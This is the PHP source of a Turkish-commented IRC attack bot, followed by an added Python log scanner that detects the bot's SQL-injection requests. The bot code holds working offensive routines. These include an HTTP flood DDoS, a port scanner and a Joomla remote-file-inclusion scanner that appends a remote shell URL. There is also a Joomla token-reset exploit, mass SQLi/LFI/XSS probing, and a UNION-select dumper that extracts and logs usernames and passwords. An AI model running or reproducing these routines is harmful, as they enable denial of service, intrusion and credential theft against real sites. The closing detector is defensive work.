#Added with the MySQL Dumper; check later
private function kaydet($url,$data)
{
$site = $this->parse($url);
$ac = fopen($site.'.txt','ab');
fwrite($ac,$data."\n");
fclose($ac);
}

#Added with the MySQL Dumper; check later
private function parse($url)
{
$site = parse_url($url);
$site = $site["host"];
return $site;
}

private function basic_password()
{

$sifre_al = file_get_contents($this->basic_password);
$sifreler = explode("\n",$sifre_al);
return $sifreler;
}

private function explode_rfi($gelen)
{

$gelen = explode("=",$gelen);
$site = $gelen[0]."=";
return $site;
}

private function ayir($gelen)
{

$this->ex = explode(' ',$gelen);
}

## 22.06.2011 source parameter added as part of the speed-up work
private function wordpress_bul($kaynak,$site)
{

if ( stristr( $kaynak,$this->wordpress_regex[1]) or stristr( $kaynak,$this->wordpress_regex[2]) )
{
$this->yaz($this->yesil . " Wordpress Bulundu.Kayýt Ediliyor");
$this->kayit($this->incele_wp,$site."\n");
$this->wp_durum = true;
}
else
{
$this->wp_durum = false;
}
}

private function joomla_bul($kaynak,$site)
{

if ( stristr( $kaynak,$this->joomla_regex[1]) )
{
$this->yaz($this->kirmizi . " Joomla Bulundu.Kayýt Ediliyor");
$this->kayit($this->incele_joomla,$site."\n");
$this->joom_durum = true;
}
else
{
$this->joom_durum = false;
}
}

private function incele()
{

unlink ($this->incele_wp);
unlink ($this->incele_joomla);
unlink ($this->ozgun_site);
$this->yaz($this->kirmizi . "inceleme iþlemi Baþladi");
$kaynak = file_get_contents($this->reverse_dosya);
$ayir = explode("\n",$kaynak);
foreach($ayir as $ayrik)
{
$site = trim($ayrik);
if (! empty($site))
{
$this->yaz("incelenen site : ".$site);
//22.06.2011 speed-up work start
#Fetching the source only once this way should make this three times faster
$inc_kaynak = $this->get($site);
$this->wordpress_bul($inc_kaynak,$site); //Old Version $this->wordpress_bul($site);
$this->joomla_bul($inc_kaynak,$site); //Old Version $this->joomla_bul($site);
//22.06.2011 speed-up work end
if( $this->wp_durum == false and $this->joom_durum == false)
{
$this->yaz($this->mavi . "Özgün Script Taramasi Baþladi");
$this->yaz($this->turuncu . $site . $this->mavi . " Linkleri alýnýyor");
$this->ozgun_site($inc_kaynak,$site);
}
}
}
$this->yaz($this->kirmizi . "inceleme iþlemi sona erdi");
}

private function wordpress_oto ()
{
$this->yaz($this->kirmizi . " Hedef Servera için bütün wordpressler taranýyor lütfen bekleyiniz");
$kaynak = file_get_contents($this->incele_wp);
$ayir = explode("\n",$kaynak);
foreach($ayir as $ayrik)
{

$site = trim($ayrik);
if(! empty ($site) )
{
$this->wordpress($site);
}
}
$this->yaz($this->kirmizi . "Wordpress Taramasi Sona erdi");
}

#Header Flood V.2.0
#Example command -> !ddos www.burtay.org index.php 100
private function DDos()
{
$site = $this->ex[4];
$path = $this->ex[5];
$atak = $this->ex[6];
$this->yaz($this->turuncu . $site . " için DDos Baþladi");
for( $i = 0; $i <=$atak ; $i++ )
{

$fp = fsockopen( $site, 80, $errno, $errstr, 30 );
if( $fp )
{
$out = "GET /".$path." HTTP/1.1\r\n";
$out .= "Host: ".$site."\r\n";
$out .= "Keep-Alive: 300\r\n";
$out .= "Connection: keep-alive\r\n\r\n";
fwrite( $fp, $out );
fclose( $fp );
}
}
$this->yaz($this->turuncu . $site . " için DDos bitti");
}

#PORT SCANNER added in V2.0
private function port_scanner()
{
$ip = $this->ex[4];
$basla = $this->ex[5];
$bit = $this->ex[6];
$this->yaz($this->turuncu . "Port Taramasi Baþladi");
$this->yaz($this->turuncu . "Tarama Yapýlacak IP/Domain : " . $this->yesil ." ". $ip);
for($i=$basla ; $i<=$bit ; $i++)
{

$socket = fsockopen($ip,$i,$hatano,$hatastr,3);
if($socket)
{
$this->yaz($this->kirmizi ." ". $i . $this->yesil . " Nolu Port Açýk");
}
}
}

#Joomla RFI Scanner
private function joom_rfi($domain)
{
$kaynak = $this->get($this->joom_rfi);
$ayir = explode("\n",$kaynak);
$this->yaz($this->yesil . " ". count($ayir) ." Adet Kayýtlý Açýk ile RFI taranýyor ");
foreach ( $ayir as $liste )
{

$bug = trim($liste);
//$this->yaz($this->turuncu ."Denenen RFI Bug " .$this->mavi . $bug);
if( eregi($this->rfi_regex,$this->get($domain.$bug.$this->shell_adresi)) )
{
$this->yaz($this->kirmizi ."Joomla RFI " . $this->yesil . $domain.$bug);
}
elseif( eregi($this->rfi_regex,$this->get($domain.$bug.$this->shell_adresi."?")) )
{
$this->yaz($this->kirmizi ."Joomla RFI " . $this->yesil . $domain.$bug);
}
}
$this->yaz($this->yesil . "Joomla RFI Tarama Sona Erdi");
}

#Joomla Token Scanner
private function joom_token($domain)
{

$domain = trim($domain);
$kaynak = $this->get($domain . $this->token_ilk);
preg_match($this->md5_regex,$kaynak,$hash);
$this->yaz($this->turuncu ."Token Alýndý.Deðer: ". $this->yesil ." ".$hash[0]);
$kaynak = $this->post($domain.$this->token_son,"token=%27&".$hash[0]."=1");
if ( eregi ("password1",$kaynak) and eregi ("password2",$kaynak) )
{
$this->yaz($this->kirmizi . "Joomla Token Bug Bulundu : " . $domain);
}
$this->yaz($domain ." için token aramasý sona erdi");
}

#Joomla Auto Scanner
private function joom_auto()
{
$kaynak = $this->get2($this->incele_joomla);
$ayir = explode("\n",$kaynak);
foreach($ayir as $ayrik)
{

$site = trim($ayrik);
$this->yaz($this->yesil ."Denenen Joomla ".$site);
$this->joom_token($site);
$this->joom_rfi($site);
}

}

#Site inspection
private function ozgun_site($kaynak,$domain)
{

//$domain = $domain."/";
//OLD Version $kaynak = $this->get($domain);
preg_match_all($this->link_regex,$kaynak,$linkler);
foreach($linkler[1] as $link)
{
echo $link."<br>";
if ( strstr ($link,"?") )
{
$ayir = explode('?',$link);
$ac = fopen($this->ozgun_site,'ab');
if (! eregi ($ayir[0],file_get_contents($this->ozgun_site)) )
{
if( eregi ("http://",$link) and !eregi ($domain,$link) )
{
}
else
{
if( !eregi ("http://",$link))
{
$link = $domain."/".$link;
}
fwrite($ac,$link."\n");
}
}
}
}
}

#Custom script auto-scan
private function ozgun()
{
$kaynak = $this->get2($this->ozgun_site);
$ayir = explode("\n",$kaynak);
foreach($ayir as $ayrik)
{

$link = trim($ayrik);
$this->yaz($this->yesil ."Taranan Site" . $this->kirmizi . " " . $link);
$this->sql($link);
$this->rfi($link);
$this->lfi($link);
$this->xss($link);
}
}

private function bug_kayit($bug)
{

$ac = fopen( $this->bug_log,'ab' );
fwrite($ac,$bug."\n");
fclose($ac);
$ac = fopen( $this->toplu_bug,'ab' );
fwrite($ac,$this->url_kisalt($bug)."\n");
fclose($ac);
$this->yaz($this->turuncu . "Bulunan Bug Kaydedildi");
}

#Youtube Downloader V.2.1
#Downloads the video at the given YouTube link
#Example command -> !youtube http://www.youtube.com/watch?v=-e_mZCmFJwI
private function youtube_isim($link)
{
//Array that the video links extracted by regex are pushed into at the end of the method
$linkler = array();
//Fetch the source of the page that contains the video
$kaynak = $this->get($link);
//Extract the video name from the source
preg_match($this->youtube_isim,$kaynak,$name);
//Strip the unneeded parts from the extracted video name
$isim = substr($name[1],23,-3);
//Report the status to the channel
$this->yaz("You".$this->kirmizi . "Tube " . $this->siyah .$isim . " isimli Video indirilmeye basladi Lütfen Sabirlica Bekleyiniz!");
//
$kaynak = str_replace('\/\/','//',$kaynak);
preg_match_all($this->youtube_regex,$kaynak,$xxx);

foreach($xxx[0] as $x)
{
$x = rawurldecode($x);
$x = str_replace('%2C',',',$x);
$x = str_replace('\/','/',$x);
if(!eregi('generate',$x))
{
array_push($linkler,$x);
}
}

$linkler = array_unique($linkler);

#Download with cURL
$video = $this->get($linkler[0]);
file_put_contents("Youtube/".$isim.".flv",$video);
$this->yaz("Video '".$isim."' ismi ile kaydedildi");
}

#MySQL Injection Dumper V.2.1
#On sites with MySQL injection, when the required information is supplied, pulls the usernames and passwords and saves them
#Example command -> !dump www.burtay.org/index.php?id=3 20 13 username password admin --
private function dump()
{
$site = $this->ex[4];
$kolon_sayisi = $this->ex[5];
$etkilenen_kolon = $this->ex[6];
$username = $this->ex[7];
$password = $this->ex[8];
$tablo = $this->ex[9];
$son = $this->ex[10];

$colons = 'concat('.$this->hex_code[0].','.$username.',0x3a,'.$password.','.$this->hex_code[1].')';
$counts = 'concat('.$this->hex_code[0].',count('.$username.'),'.$this->hex_code[1].')';
$colon = null;
$count = null;
for($i=1 ; $i<=$kolon_sayisi ; $i++)
{
//If the affected column and the column count are both 1
if( $kolon_sayisi==1 )
{
$colon = $colons;
$count = $counts;
}
elseif( $i == $etkilenen_kolon )
{
$colon = $colon . ','. $colons;
$count = $count . ','. $counts;
}

elseif( $colon == null )
{
$colon = $i;
$count = $i;
}
else
{
$colon = $colon . ','. $i;
$count = $count . ','. $i;
}
}

$say = $site . "+and+1=0+union+select+".$count."+from+".$tablo.$son;
$kaynak = $this->get($say);
preg_match($this->dumper_regex,$kaynak,$toplam);
$info = "[+] Total ". $toplam[1] ." User-Pass List";
$this->yaz($this->kirmizi."[+] MySQL Injection Site -> ". $site );
$this->yaz($this->kirmizi."[+] Total Column Number -> ". $kolon_sayisi);
$this->yaz($this->kirmizi."[+] Effected Colon Number -> ". $etkilenen_kolon);
$this->yaz($this->kirmizi."[+] Username Colon Name -> ". $username);
$this->yaz($this->kirmizi."[+] Password Colon Name -> ". $password);
$this->yaz($this->kirmizi."[+] Table Name -> ". $tablo);
$this->yaz($this->kirmizi . $info);
$this->kaydet($site,$info);
$this->kaydet($site,"[+] URL->".$say);

for($k=0; $k<=$toplam[1] ; $k++)
{
$m = $k+1;
$sites = $site . '+aNd+1=0+uNioN+SeLeCt+'.$colon.'+fRom+'.$tablo.'+limit+'.$k.',1'.$son;
$kaynak = $this->get($sites);
preg_match($this->dumper_regex,$kaynak,$list);
$this->yaz( "[". $m ."] ".$list[1]);
$this->kaydet($site,$list[1]);
}
$this->yaz( "MySQL DUMP islemi Bitti");
}

}

$class = new IRC_BOT();

?>
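
A defender's view of the dump() routine above, as an added example that is not part of Bottay or of the original page: it scans web access logs for the request shape dump() builds (an "and 1=0 union select ... from <table>" count probe followed by one "limit k,1" request per row). The function name find_dump_sessions, the combined log format, the sample lines and the 0x7e marker value are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (not real traffic). 0x7e stands in for the
# bot's $this->hex_code markers, whose values are not shown in this section.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Jun/2011:10:00:01 +0000] "GET /index.php?id=3+and+1=0+union+select+1,concat(0x7e,count(username),0x7e),3+from+admin-- HTTP/1.1" 200 512
203.0.113.7 - - [30/Jun/2011:10:00:02 +0000] "GET /index.php?id=3+aNd+1=0+uNioN+SeLeCt+1,concat(0x7e,username,0x3a,password,0x7e),3+fRom+admin+limit+0,1-- HTTP/1.1" 200 530
203.0.113.7 - - [30/Jun/2011:10:00:03 +0000] "GET /index.php?id=3+aNd+1=0+uNioN+SeLeCt+1,concat(0x7e,username,0x3a,password,0x7e),3+fRom+admin+limit+1,1-- HTTP/1.1" 200 531
203.0.113.7 - - [30/Jun/2011:10:00:04 +0000] "GET /index.php?id=3+aNd+1=0+uNioN+SeLeCt+1,concat(0x7e,username,0x3a,password,0x7e),3+fRom+admin+limit+2,1-- HTTP/1.1" 200 529
198.51.100.4 - - [30/Jun/2011:10:00:05 +0000] "GET /index.php?id=3 HTTP/1.1" 200 4096
198.51.100.4 - - [30/Jun/2011:10:00:06 +0000] "GET /search.php?q=student+union+select+committee HTTP/1.1" 200 2048
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP')
# Case-insensitive and applied after URL decoding, so the mixed-case keywords
# and '+' separators that dump() emits do not hide the request.
DUMP_SHAPE = re.compile(
    r"\band\s+1=0\s+union\s+select\s.+?\sfrom\s+\S+(?:\s+limit\s+(\d+),1)?", re.I)

def find_dump_sessions(log_text):
    """Map client IP -> evidence of the count probe and the LIMIT k,1 row walk."""
    seen = defaultdict(lambda: {"count_probe": False, "offsets": set()})
    for line in log_text.splitlines():
        req = REQUEST.match(line)
        if not req:
            continue
        client, target = req.groups()
        hit = DUMP_SHAPE.search(unquote_plus(target))
        if not hit:
            continue
        if hit.group(1) is None:
            seen[client]["count_probe"] = True  # query without a LIMIT clause
        else:
            seen[client]["offsets"].add(int(hit.group(1)))
    report = {}
    for client, ev in seen.items():
        offsets = sorted(ev["offsets"])
        report[client] = {
            "count_probe": ev["count_probe"],
            "offsets": offsets,
            # Offsets 0,1,2,... with no gaps mean one request per table row.
            "sequential": len(offsets) >= 2 and offsets == list(range(len(offsets))),
        }
    return report

if __name__ == "__main__":
    for client, evidence in find_dump_sessions(SAMPLE_LOG).items():
        print(client, evidence)
```

A client flagged with both count_probe and sequential has most likely walked a whole table, so the response sizes of those requests are worth reviewing during triage.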